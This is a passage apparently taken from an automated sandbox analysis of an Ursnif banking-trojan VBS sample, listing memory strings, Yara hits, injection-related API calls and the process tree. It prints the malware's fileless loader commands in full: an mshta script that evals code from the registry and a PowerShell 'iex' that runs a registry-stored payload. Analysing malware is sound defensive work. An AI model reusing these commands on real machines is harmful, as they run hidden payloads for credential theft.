            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Yara detected Ursnif
            Source: Yara match | File source: 00000006.00000003.579535833.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.579647192.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.646154649.0000000002800000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.579582589.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.587774108.000000000512B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.579617735.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000024.00000002.685503621.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.579669420.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.579729595.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.579690205.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.701647863.00000000027B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.579713449.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000025.00000002.675164378.000000000058E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
            Source: Yara match | File source: Process Memory Space: control.exe PID: 3596, type: MEMORY

            E-Banking Fraud:

            Yara detected Ursnif

            System Summary:

            Source: C:\Windows\explorer.exe | Code function: 36_2_04CF6F64 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CE33F8 NtQueryInformationProcess
            Source: C:\Windows\explorer.exe | Code function: 36_2_04D21003 NtProtectVirtualMemory,NtProtectVirtualMemory
            Source: C:\Windows\System32\control.exe | Code function: 37_2_005568E0 NtReadVirtualMemory
            Source: C:\Windows\System32\control.exe | Code function: 37_2_005670B8 NtMapViewOfSection
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00561154 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,FindCloseChangeNotification
            Source: C:\Windows\System32\control.exe | Code function: 37_2_005729D0 NtAllocateVirtualMemory
            Source: C:\Windows\System32\control.exe | Code function: 37_2_0055C188 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00569B08 NtCreateSection
            Source: C:\Windows\System32\control.exe | Code function: 37_2_005533F8 NtQueryInformationProcess
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00552CC0 NtQueryInformationProcess
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00557F44 NtWriteVirtualMemory
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00566F64 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00591003 NtProtectVirtualMemory,NtProtectVirtualMemory
            Source: my_presentation_96642.vbs | Initial sample: Strings found which are bigger than 50
            Source: a11zr31h.dll.32.dr | Static PE information: No import functions for PE file found
            Source: x0s3qhtp.dll.34.dr | Static PE information: No import functions for PE file found
            Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: classification engine | Classification label: mal100.troj.evad.winVBS@24/51@4/2
            Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{4B9FB8E4-F8AF-11EA-90E2-ECF4BB862DED}.dat
            Source: C:\Windows\System32\control.exe | Mutant created: \Sessions\1\BaseNamedObjects\{226BE949-19F0-A41A-B376-5D18970AE1CC}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{2AD27732-815B-ECFE-5BFE-45E0BF124914}
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3612:120:WilError_01
            Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\adobe.url
            Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\my_presentation_96642.vbs'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini
            Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: my_presentation_96642.vbs | Virustotal: Detection: 14%
            Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\my_presentation_96642.vbs'
            Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:9474 /prefetch:2
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:3740956 /prefetch:2
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75030 /prefetch:2
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75038 /prefetch:2
            Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline'
            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES235.tmp' 'c:\Users\user\AppData\Local\Temp\CSC37C4AB5BD67C482EA05BF33DBF5C85DE.TMP'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\x0s3qhtp.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES12CF.tmp' 'c:\Users\user\AppData\Local\Temp\CSCF573EE57D69F4661A05CCF421E73DB.TMP'
            Source: unknownProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:9474 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:3740956 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75030 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75038 /prefetch:2Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\x0s3qhtp.cmdline'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES235.tmp' 'c:\Users\user\AppData\Local\Temp\CSC37C4AB5BD67C482EA05BF33DBF5C85DE.TMP'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES12CF.tmp' 'c:\Users\user\AppData\Local\Temp\CSCF573EE57D69F4661A05CCF421E73DB.TMP'
            Source: C:\Windows\System32\control.exeProcess created: unknown unknown
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\